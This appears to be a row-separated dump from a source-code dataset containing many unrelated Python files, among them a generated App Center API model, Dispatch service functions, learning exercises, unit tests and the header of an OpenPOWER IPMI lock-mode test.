| 22.393443 | 65 | 0.614934 | 162 | 1,366 | 4.864198 | 0.512346 | 0.02665 | 0.038071 | 0.053299 | 0.068528 | 0.068528 | 0 | 0 | 0 | 0 | 0 | 0.032393 | 0.299414 | 1,366 | 60 | 66 | 22.766667 | 0.791014 | 0.199122 | 0 | 0.081081 | 0 | 0 | 0.007394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162162 | false | 0.081081 | 0.135135 | 0.027027 | 0.648649 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
d722d3dbdd851da32d3a6d5f6fb12b40e48dbb16 | 227 | py | Python | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | def factorial(num):
    # When writing a recursive function, find the exit (base) condition first.
if num <= 1:
return 1
return factorial(num - 1) * num
def main():
print(factorial(5))
# return 120
if __name__ == "__main__":
main() | 17.461538 | 36 | 0.53304 | 30 | 227 | 3.766667 | 0.566667 | 0.212389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047297 | 0.348018 | 227 | 13 | 37 | 17.461538 | 0.716216 | 0.154185 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0.125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d728c55b4f2bb7d8f35b667f6a550393bb16970f | 16,046 | py | Python | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | null | null | null | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | 6 | 2019-10-23T06:38:53.000Z | 2022-01-22T07:57:58.000Z | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | 2 | 2019-10-23T06:31:05.000Z | 2021-08-21T17:32:47.000Z | # coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
import pprint
import re # noqa: F401
import six
class InternalHockeyAppCompatibilityResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
allowed enum values
"""
slack = "slack"
teams = "teams"
generic = "generic"
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'owner_type': 'string',
'os': 'string',
'platform': 'string',
'has_crashes': 'boolean',
'has_feedback': 'boolean',
'has_metrics': 'boolean',
'has_external_builds': 'boolean',
'has_specified_build_server_url': 'boolean',
'has_distribution_groups_outside_of_ownership': 'boolean',
'owner_has_distribution_groups': 'boolean',
'bugtracker_type': 'string',
'webhook_types': 'array'
}
attribute_map = {
'owner_type': 'owner_type',
'os': 'os',
'platform': 'platform',
'has_crashes': 'has_crashes',
'has_feedback': 'has_feedback',
'has_metrics': 'has_metrics',
'has_external_builds': 'has_external_builds',
'has_specified_build_server_url': 'has_specified_build_server_url',
'has_distribution_groups_outside_of_ownership': 'has_distribution_groups_outside_of_ownership',
'owner_has_distribution_groups': 'owner_has_distribution_groups',
'bugtracker_type': 'bugtracker_type',
'webhook_types': 'webhook_types'
}
def __init__(self, owner_type=None, os=None, platform=None, has_crashes=None, has_feedback=None, has_metrics=None, has_external_builds=None, has_specified_build_server_url=None, has_distribution_groups_outside_of_ownership=None, owner_has_distribution_groups=None, bugtracker_type=None, webhook_types=None): # noqa: E501
"""InternalHockeyAppCompatibilityResponse - a model defined in Swagger""" # noqa: E501
self._owner_type = None
self._os = None
self._platform = None
self._has_crashes = None
self._has_feedback = None
self._has_metrics = None
self._has_external_builds = None
self._has_specified_build_server_url = None
self._has_distribution_groups_outside_of_ownership = None
self._owner_has_distribution_groups = None
self._bugtracker_type = None
self._webhook_types = None
self.discriminator = None
if owner_type is not None:
self.owner_type = owner_type
if os is not None:
self.os = os
if platform is not None:
self.platform = platform
if has_crashes is not None:
self.has_crashes = has_crashes
if has_feedback is not None:
self.has_feedback = has_feedback
if has_metrics is not None:
self.has_metrics = has_metrics
if has_external_builds is not None:
self.has_external_builds = has_external_builds
if has_specified_build_server_url is not None:
self.has_specified_build_server_url = has_specified_build_server_url
if has_distribution_groups_outside_of_ownership is not None:
self.has_distribution_groups_outside_of_ownership = has_distribution_groups_outside_of_ownership
if owner_has_distribution_groups is not None:
self.owner_has_distribution_groups = owner_has_distribution_groups
if bugtracker_type is not None:
self.bugtracker_type = bugtracker_type
if webhook_types is not None:
self.webhook_types = webhook_types
@property
def owner_type(self):
"""Gets the owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
The owner type of the app # noqa: E501
:return: The owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._owner_type
@owner_type.setter
def owner_type(self, owner_type):
"""Sets the owner_type of this InternalHockeyAppCompatibilityResponse.
The owner type of the app # noqa: E501
:param owner_type: The owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
allowed_values = [undefined, undefined, undefined, ] # noqa: E501
self._owner_type = owner_type
@property
def os(self):
"""Gets the os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
The OS of the app # noqa: E501
:return: The os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._os
@os.setter
def os(self, os):
"""Sets the os of this InternalHockeyAppCompatibilityResponse.
The OS of the app # noqa: E501
:param os: The os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
        allowed_values = []  # noqa: E501  # codegen bug: the enum values were emitted as JavaScript-style `undefined`; left empty
self._os = os
@property
def platform(self):
"""Gets the platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
        The platform of the app  # noqa: E501
:return: The platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._platform
@platform.setter
def platform(self, platform):
"""Sets the platform of this InternalHockeyAppCompatibilityResponse.
        The platform of the app  # noqa: E501
:param platform: The platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
        allowed_values = []  # noqa: E501  # codegen bug: the enum values were emitted as JavaScript-style `undefined`; left empty
self._platform = platform
@property
def has_crashes(self):
"""Gets the has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have crashes from within the last 90 days? # noqa: E501
:return: The has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_crashes
@has_crashes.setter
def has_crashes(self, has_crashes):
"""Sets the has_crashes of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have crashes from within the last 90 days? # noqa: E501
:param has_crashes: The has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_crashes = has_crashes
@property
def has_feedback(self):
"""Gets the has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have feedback from within the last 90 days? # noqa: E501
:return: The has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_feedback
@has_feedback.setter
def has_feedback(self, has_feedback):
"""Sets the has_feedback of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have feedback from within the last 90 days? # noqa: E501
:param has_feedback: The has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_feedback = has_feedback
@property
def has_metrics(self):
"""Gets the has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have metrics from within the last 30 days? # noqa: E501
:return: The has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_metrics
@has_metrics.setter
def has_metrics(self, has_metrics):
"""Sets the has_metrics of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have metrics from within the last 30 days? # noqa: E501
:param has_metrics: The has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_metrics = has_metrics
@property
def has_external_builds(self):
"""Gets the has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any external builds? # noqa: E501
:return: The has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_external_builds
@has_external_builds.setter
def has_external_builds(self, has_external_builds):
"""Sets the has_external_builds of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any external builds? # noqa: E501
:param has_external_builds: The has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_external_builds = has_external_builds
@property
def has_specified_build_server_url(self):
"""Gets the has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any build server URLs specified? # noqa: E501
:return: The has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_specified_build_server_url
@has_specified_build_server_url.setter
def has_specified_build_server_url(self, has_specified_build_server_url):
"""Sets the has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any build server URLs specified? # noqa: E501
:param has_specified_build_server_url: The has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_specified_build_server_url = has_specified_build_server_url
@property
def has_distribution_groups_outside_of_ownership(self):
"""Gets the has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have an associated Distribution Group that is owned by a different owner? # noqa: E501
:return: The has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_distribution_groups_outside_of_ownership
@has_distribution_groups_outside_of_ownership.setter
def has_distribution_groups_outside_of_ownership(self, has_distribution_groups_outside_of_ownership):
"""Sets the has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have an associated Distribution Group that is owned by a different owner? # noqa: E501
:param has_distribution_groups_outside_of_ownership: The has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_distribution_groups_outside_of_ownership = has_distribution_groups_outside_of_ownership
@property
def owner_has_distribution_groups(self):
"""Gets the owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app's owner own any Distribution Groups? # noqa: E501
:return: The owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._owner_has_distribution_groups
@owner_has_distribution_groups.setter
def owner_has_distribution_groups(self, owner_has_distribution_groups):
"""Sets the owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app's owner own any Distribution Groups? # noqa: E501
:param owner_has_distribution_groups: The owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._owner_has_distribution_groups = owner_has_distribution_groups
@property
def bugtracker_type(self):
"""Gets the bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any bugtracker configured? Which type? # noqa: E501
:return: The bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._bugtracker_type
@bugtracker_type.setter
def bugtracker_type(self, bugtracker_type):
"""Sets the bugtracker_type of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any bugtracker configured? Which type? # noqa: E501
:param bugtracker_type: The bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
        allowed_values = []  # noqa: E501  # codegen bug: the enum values were emitted as JavaScript-style `undefined`; left empty
self._bugtracker_type = bugtracker_type
@property
def webhook_types(self):
"""Gets the webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any webhooks configured? Which types? # noqa: E501
:return: The webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: array
"""
return self._webhook_types
@webhook_types.setter
def webhook_types(self, webhook_types):
"""Sets the webhook_types of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any webhooks configured? Which types? # noqa: E501
:param webhook_types: The webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: array
"""
self._webhook_types = webhook_types
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InternalHockeyAppCompatibilityResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
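The `to_dict` method above recurses through lists, nested models, and plain dicts. A minimal stand-alone sketch of the same pattern, using a toy model rather than the generated `InternalHockeyAppCompatibilityResponse` (names here are illustrative):

```python
# Hypothetical stand-in model demonstrating the recursive to_dict walk:
# list elements and nested models are serialized, plain values pass through.
class ToyModel(object):
    swagger_types = {'name': 'str', 'children': 'list'}

    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []

    def to_dict(self):
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [x.to_dict() if hasattr(x, "to_dict") else x
                                for x in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            else:
                result[attr] = value
        return result

parent = ToyModel('root', [ToyModel('leaf')])
print(parent.to_dict())  # {'name': 'root', 'children': [{'name': 'leaf', 'children': []}]}
```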
# --- src/dispatch/incident_priority/service.py (repo: mclueppers/dispatch, license: Apache-2.0) ---
from typing import List, Optional
from fastapi.encoders import jsonable_encoder
from sqlalchemy.sql.expression import true
from .models import IncidentPriority, IncidentPriorityCreate, IncidentPriorityUpdate
def get(*, db_session, incident_priority_id: int) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given priority id."""
return (
db_session.query(IncidentPriority)
.filter(IncidentPriority.id == incident_priority_id)
.one_or_none()
)
def get_default(*, db_session):
"""Returns the current default incident_priority."""
return (
db_session.query(IncidentPriority).filter(IncidentPriority.default == true()).one_or_none()
)
def get_by_name(*, db_session, name: str) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given priority name."""
return db_session.query(IncidentPriority).filter(IncidentPriority.name == name).one_or_none()
def get_by_slug(*, db_session, slug: str) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given type slug."""
return db_session.query(IncidentPriority).filter(IncidentPriority.slug == slug).one_or_none()
def get_all(*, db_session) -> List[Optional[IncidentPriority]]:
"""Returns all incident priorities."""
return db_session.query(IncidentPriority)
def create(*, db_session, incident_priority_in: IncidentPriorityCreate) -> IncidentPriority:
"""Creates an incident priority."""
incident_priority = IncidentPriority(**incident_priority_in.dict())
db_session.add(incident_priority)
db_session.commit()
return incident_priority
def update(
*, db_session, incident_priority: IncidentPriority, incident_priority_in: IncidentPriorityUpdate
) -> IncidentPriority:
"""Updates an incident priority."""
incident_priority_data = jsonable_encoder(incident_priority)
update_data = incident_priority_in.dict(skip_defaults=True)
for field in incident_priority_data:
if field in update_data:
setattr(incident_priority, field, update_data[field])
db_session.add(incident_priority)
db_session.commit()
return incident_priority
def delete(*, db_session, incident_priority_id: int):
"""Deletes an incident priority."""
db_session.query(IncidentPriority).filter(IncidentPriority.id == incident_priority_id).delete()
db_session.commit()
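The `update` helper above copies only the fields the caller actually supplied, leaving the rest of the model untouched. The same merge pattern stripped of SQLAlchemy and Pydantic, with plain objects standing in for the ORM model and the update payload (names are illustrative):

```python
class IncidentPriority(object):  # stand-in for the ORM model, not the real class
    def __init__(self, name, slug, default=False):
        self.name = name
        self.slug = slug
        self.default = default

def apply_update(obj, update_data):
    # mirror of the loop above: only keys present in the payload are applied,
    # like incident_priority_in.dict(skip_defaults=True)
    for field in vars(obj):
        if field in update_data:
            setattr(obj, field, update_data[field])
    return obj

p = IncidentPriority(name="low", slug="low")
apply_update(p, {"name": "medium"})
print(p.name, p.slug)  # medium low  -- slug and default stay untouched
```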
# --- mangopi/tests/site/test_mangaFox.py (repo: BFTeck/mangopi, license: MIT) ---
from unittest import TestCase
from mangopi.site.mangafox import MangaFox
class TestMangaFox(TestCase):
SERIES = MangaFox.series('gantz')
CHAPTERS = SERIES.chapters
def test_chapter_count(self):
self.assertEqual(len(TestMangaFox.CHAPTERS), 386)
def test_chapter_title(self):
self.assertEqual(TestMangaFox.CHAPTERS[-2].title, 'Lightning Counterstrike')
def test_chapter_pages(self):
self.assertEqual(len(TestMangaFox.CHAPTERS[0].pages), 43)
def test_for_image_url(self):
self.assertIsNone(TestMangaFox.CHAPTERS[0].pages[0].image)
# --- circuit_mapper/gate_1_qubit.py (repo: quantumgenetics/quantumgenetics, license: Apache-2.0) ---
#!/usr/bin/env python3
from functools import partial
def combine(qubit_count, gates):
return [partial(g, i) for g in gates for i in range(qubit_count)]
def repeat_none(index, count):
return [partial(apply_none, index)] * count
def apply_none(index, circuit):
pass
def apply_not(index, circuit):
qr = circuit.qregs[0]
circuit.x(qr[index])
def apply_phase_flip(index, circuit):
qr = circuit.qregs[0]
circuit.z(qr[index])
def apply_hadamard(index, circuit):
qr = circuit.qregs[0]
circuit.h(qr[index])
def apply_y_rotation(theta, index, circuit):
qr = circuit.qregs[0]
circuit.ry(theta, qr[index])
def apply_z_rotation(phi, index, circuit):
qr = circuit.qregs[0]
circuit.rz(phi, qr[index])
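`combine` above pre-binds the qubit index into each gate function with `functools.partial`, yielding one callable per (gate, qubit) pair that later only needs the circuit. A self-contained demo with a stub standing in for a Qiskit circuit:

```python
from functools import partial

def combine(qubit_count, gates):
    # same helper as above: one partial per gate per qubit index
    return [partial(g, i) for g in gates for i in range(qubit_count)]

applied = []

def fake_gate(index, circuit):      # same (index, circuit) signature as the appliers above
    applied.append((circuit, index))

ops = combine(3, [fake_gate])       # three partials, indices 0..2
for op in ops:
    op("qc")                        # supply the remaining `circuit` argument
print(applied)                      # [('qc', 0), ('qc', 1), ('qc', 2)]
```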
# --- MANN/Utils/similarities.py (repo: jgyllinsky/How-to-Learn-from-Little-Data, license: MIT) ---
import tensorflow as tf
def cosine_similarity(x, y, eps=1e-6):
    z = tf.matmul(x, tf.transpose(y, perm=[0, 2, 1]))  # tf.batch_matmul was merged into tf.matmul in TF 1.0
z /= tf.sqrt(tf.multiply(tf.expand_dims(tf.reduce_sum(tf.multiply(x,x), 2), 2),tf.expand_dims(tf.reduce_sum(tf.multiply(y,y), 2), 1)) + eps)
return z
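The graph op above divides the batched dot products x·yᵀ by the product of the row norms, with `eps` added inside the square root to guard against division by zero. The same eps-stabilized formula for a single pair of vectors in plain Python:

```python
import math

def cosine_similarity(x, y, eps=1e-6):
    # dot(x, y) / sqrt(|x|^2 * |y|^2 + eps), matching the TF expression above
    dot = sum(a * b for a, b in zip(x, y))
    sx = sum(a * a for a in x)
    sy = sum(b * b for b in y)
    return dot / math.sqrt(sx * sy + eps)

print(round(cosine_similarity([1.0, 0.0], [1.0, 0.0]), 3))  # ~1.0 (identical vectors)
print(cosine_similarity([1.0, 0.0], [0.0, 1.0]))            # 0.0 (orthogonal vectors)
```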
# --- src/home_automation_hub/storage.py (repo: levidavis/py-home, license: MIT) ---
import redis
import json
from . import config
redis_instance = None
def set_up(host, port, db):
global redis_instance
redis_instance = redis.StrictRedis(host=host, port=port, db=db)
class ModuleStorage():
def __init__(self, module_id):
self.key_prefix = "module:" + config.config.enabled_modules[module_id]["storage_prefix"]
@property
def redis(self):
return redis_instance
def prefixed_key(self, key):
return f"{self.key_prefix}:{key}"
def get(self, key):
data_json = redis_instance.get(self.prefixed_key(key))
if not data_json:
return None
data = json.loads(data_json)
return data.get("data")
def set(self, key, value):
data_json = json.dumps({"data": value})
return redis_instance.set(self.prefixed_key(key), data_json)
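`ModuleStorage` namespaces every key with a per-module prefix and JSON-wraps values under a `"data"` envelope before they reach Redis. The round trip can be sketched with an in-memory dict standing in for Redis (the stub below is illustrative, not part of the module):

```python
import json

class FakeRedis(object):            # minimal stand-in for redis.StrictRedis
    def __init__(self):
        self.store = {}
    def get(self, key):
        return self.store.get(key)
    def set(self, key, value):
        self.store[key] = value

r = FakeRedis()
prefix = "module:demo"              # hypothetical storage_prefix value

def set_value(key, value):
    # wrap the value in a {"data": ...} envelope, like ModuleStorage.set
    r.set("%s:%s" % (prefix, key), json.dumps({"data": value}))

def get_value(key):
    # unwrap the envelope, like ModuleStorage.get
    raw = r.get("%s:%s" % (prefix, key))
    return json.loads(raw)["data"] if raw else None

set_value("brightness", 75)
print(get_value("brightness"))      # 75
print(sorted(r.store))              # ['module:demo:brightness']
```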
# --- user_Test.py (repo: Robertokello11/Password-Locker, license: MIT) ---
import unittest  # import the unittest module
from user import User  # import the User class under test
class TestUser(unittest.TestCase):
def setUp(self):
'''
method to run before each test
'''
self.new_user=User("Robert", "Robert11") #new User created
def tearDown(self):
'''
clean up to prevent errors
'''
User.user_list = []
# Test 2 ##
def test__init(self):
'''
check if class is initialiazing as expected
'''
self.assertEqual(self.new_user.username, "Robert")
self.assertEqual(self.new_user.password, "Robert11")
def test_save_user(self):
'''
confirm if the user information can be saved
in the user list
'''
self.new_user.save_user()
self.assertEqual(len(User.user_list), 1)
# 3rd test ## saving users ##
def test_save_mutliple_users(self):
'''
check whether you can store more than one user
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
self.assertEqual(len(User.user_list), 2)
#4th test## Delete user ##
def test_delete_user(self):
'''
check whether one can delete a user account
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
self.new_user.delete_user()
self.assertEqual(len(User.user_list), 1)
##5th test#
def test_find_user(self):
'''
find a user using username
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
found_user = User.find_user("Robert")
self.assertEqual(found_user.username, self.new_user.username)
if __name__ == '__main__':
unittest.main()
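The suite above exercises a `User` class from `user.py` that is not shown here. A minimal sketch consistent with what the tests call — a class-level `user_list`, `save_user`, `delete_user`, and a `find_user` lookup — might look like this (an assumption, not the actual `user.py`):

```python
class User(object):
    user_list = []  # shared registry, reset by the suite's tearDown

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def save_user(self):
        User.user_list.append(self)

    def delete_user(self):
        User.user_list.remove(self)

    @classmethod
    def find_user(cls, username):
        # linear scan by username, as test_find_user expects
        for user in cls.user_list:
            if user.username == username:
                return user
        return None

u = User("Robert", "Robert11")
u.save_user()
print(len(User.user_list), User.find_user("Robert").password)  # 1 Robert11
```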
# --- src/utils/config.py (repo: cpaismz89/DeepFireTopology, license: MIT) ---
# Run Keras on CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = " " # -1 if CPU
# Importations
from IPython.display import Image
# Compressed pickle
import pickle
from compress_pickle import dump as cdump
from compress_pickle import load as cload
import io
# Importations
import numpy as np
import pandas as pd
import re
import random
import time
# Deep learning
import tensorflow as tf
import keras
from keras.models import Sequential, Model, load_model
from keras.regularizers import l2
from keras.layers import Dense, Input, Flatten, Dropout, BatchNormalization, Activation
from keras.wrappers.scikit_learn import KerasClassifier
from keras.constraints import maxnorm
from keras.callbacks import ModelCheckpoint, EarlyStopping, LearningRateScheduler
from keras.utils.vis_utils import plot_model
from keras.utils import np_utils
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
from keras.layers.recurrent import LSTM, GRU
from keras.layers.wrappers import TimeDistributed
from keras.layers.merge import concatenate
from keras.optimizers import SGD, Adam
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
# Image Processing
from imutils import paths, build_montages
import imutils
import cv2
# Gridsearch
from sklearn.model_selection import GridSearchCV, KFold, train_test_split, cross_val_score
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn.preprocessing import Normalizer, StandardScaler, MinMaxScaler, LabelBinarizer, MultiLabelBinarizer, LabelEncoder
from sklearn.utils import shuffle
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error, roc_auc_score, auc, confusion_matrix, accuracy_score, classification_report
# Visuals
import seaborn as sns
import matplotlib.pyplot as plt
# Plotting training class
from IPython.display import clear_output
# Visuals scripts
import sys
sys.path.append('..') # Parent folder
from drawer.keras_util import convert_drawer_model
from drawer.pptx_util import save_model_to_pptx
from drawer.matplotlib_util import save_model_to_file
# --- examples/tornado/myapp/__init__.py (repo: s-shin/wswrapper, license: MIT) ---
# -*- coding: utf-8 -*-
def setup_argparser(parser):
"""コマンドパーサーのセットアップ。
パーサーは共有されるので、被らないように上手く調整すること。
:param parser: ``argparse.ArgumentParser`` のインスタンス。
"""
pass
def setup_app(args):
"""コマンドパース後のセットアップ。
:param args: ``parser.arg_parse()`` の戻り値。
"""
pass
def on_open(client):
"""WebSocketのコネクションが成立した時に呼ばれる。
"""
pass
def on_close(client):
"""WebSocketのコネクションが切れた時に呼ばれる。
"""
pass
def on_setup(client, data):
client.emit("print", "Hello world!")
# --- answers/Python/@oseme-techguy/03-word-in-reverse.py (repo: Flipponachi/20-questions, license: MIT) ---
"""
Solution to Word in Reverse
"""
if __name__ == '__main__':
while True:
word = input('Enter a word: ')
word = str(word)
i = len(word)
reversed_word = ''
while i > 0:
reversed_word += word[i - 1]
i -= 1
print('{reversed_word}\n'.format(reversed_word=reversed_word))
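The index-walking loop above builds the reversed string one character at a time; Python's extended slice syntax gives the same result in a single expression:

```python
def reverse_word(word):
    return word[::-1]  # a step of -1 walks the string back to front

print(reverse_word("hello"))  # olleh
```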
# --- yoga/project/yoga/Database/migrations/0001_initial.py (repo: sherlklee/yoga, license: MIT) ---
# Generated by Django 2.2.1 on 2019-06-03 11:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('username', models.CharField(max_length=20, primary_key=True, serialize=False)),
('password', models.CharField(max_length=20)),
('identity', models.CharField(default='customer', max_length=12)),
],
),
]
# --- testcases/OpTestIPMILockMode.py (repo: vaibhav92/op-test-framework, license: Apache-2.0) ---
#!/usr/bin/env python2
# IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# $Source: op-test-framework/testcases/OpTestIPMILockMode.py $
#
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2015
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# IBM_PROLOG_END_TAG
# @package OpTestIPMILockMode.py
# It will test in-band ipmi white-listed commands when ipmi is in locked mode
#
# IPMI whitelist
# These are the commands that will be available over an unauthenticated
# interface when the BMC is in IPMI lockdown mode.
# Generally one can access all in-band ipmi commands, But if we issue ipmi
# lock command then one can access only specific whitelisted in-band ipmi commands.
import time
import subprocess
import re, sys
from common.OpTestConstants import OpTestConstants as BMC_CONST
import unittest
import OpTestConfiguration
from common.OpTestUtil import OpTestUtil
from common.OpTestSystem import OpSystemState
class OpTestIPMILockMode(unittest.TestCase):
def setUp(self):
conf = OpTestConfiguration.conf
self.cv_HOST = conf.host()
self.cv_IPMI = conf.ipmi()
self.cv_SYSTEM = conf.system()
self.util = OpTestUtil()
self.platform = conf.platform()
##
# @brief This function will cover following test steps
# 1. It will get the OS level installed on power platform
# 2. It will check for kernel version installed on the Open Power Machine
# 3. It will check for ipmitool command existence and ipmitool package
# 4. Load the necessary ipmi modules based on config values
    # 5. Issue an ipmi lock command through the out-of-band authenticated interface
    # 6. Now BMC IPMI is in locked mode, at this point only white listed
    #    in-band ipmi commands should work (no other in-band ipmi command should work)
    # 7. Execute and test the functionality of whitelisted in-band ipmi
    #    commands in locked mode
    # 8. At the end of the test, issue an ipmi unlock command to restore the availability
